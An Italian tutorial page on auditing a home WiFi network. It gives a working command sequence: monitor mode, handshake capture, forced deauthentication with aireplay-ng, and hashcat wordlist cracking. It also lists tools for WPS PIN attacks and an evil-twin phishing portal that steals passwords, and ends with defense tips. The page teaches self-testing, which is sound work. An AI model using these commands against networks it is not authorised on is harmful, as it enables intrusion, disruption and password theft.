Home › Dispositivi › WiFi / rete
WiFi / rete — cosa puoi fare
La rete di casa: scoprire chi c'è, catturare l'handshake, testare la password e la robustezza.
Solo sulla tua rete WiFi. Serve una scheda con monitor mode (chiavette Alfa).
Passo 1 — chi c'è nella rete
# la tua sottorete
ip addr
# tutti i dispositivi vivi (IP + MAC + produttore)
sudo arp-scan --localnet
Cosa puoi fare / testare
| Cosa | Come | Tool |
|---|---|---|
| Vedere reti e client vicini | Monitor mode + radar delle reti | airodump-ng |
| Catturare l'handshake WPA2 | Ascolti la tua rete e forzi una riconnessione | airodump-ng + aireplay-ng |
| Craccare la password | Provi l'handshake contro una wordlist | hashcat / aircrack-ng |
| Prendere il PMKID (senza client) | Dall'access point da solo | hcxdumptool |
| Convertire la cattura per il crack | Formato per hashcat 22000 | hcxtools |
| Attaccare il PIN WPS | Brute o Pixie-Dust del WPS | reaver |
| Fare tutto in automatico | Scan → deauth → cattura → crack | wifite |
| Rete gemella (evil twin) | AP falso + portale per rubare la password | wifiphisher |
| Radar avanzato WiFi/BT | Rileva reti e dispositivi nascosti | kismet |
Prova a casa (sequenza rapida)
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon # trova BSSID e canale TUOI
sudo airodump-ng -c CH --bssid TUO_BSSID -w cap wlan0mon
sudo aireplay-ng --deauth 5 -a TUO_BSSID wlan0mon # in un 2° terminale
hashcat -m 22000 cap.hc22000 /usr/share/wordlists/rockyou.txt
Guida completa: WiFi Cracking (dettaglio).
Difesa
- Password WiFi lunga e casuale (12+): rende inutile la wordlist.
- WPA3 se il router lo supporta.
- Disattiva WPS (vulnerabile).
- Rete ospiti separata per gli IoT.
Il router in sé (pannello, CVE): Router / modem. Catalogo: Arsenale · Wireless.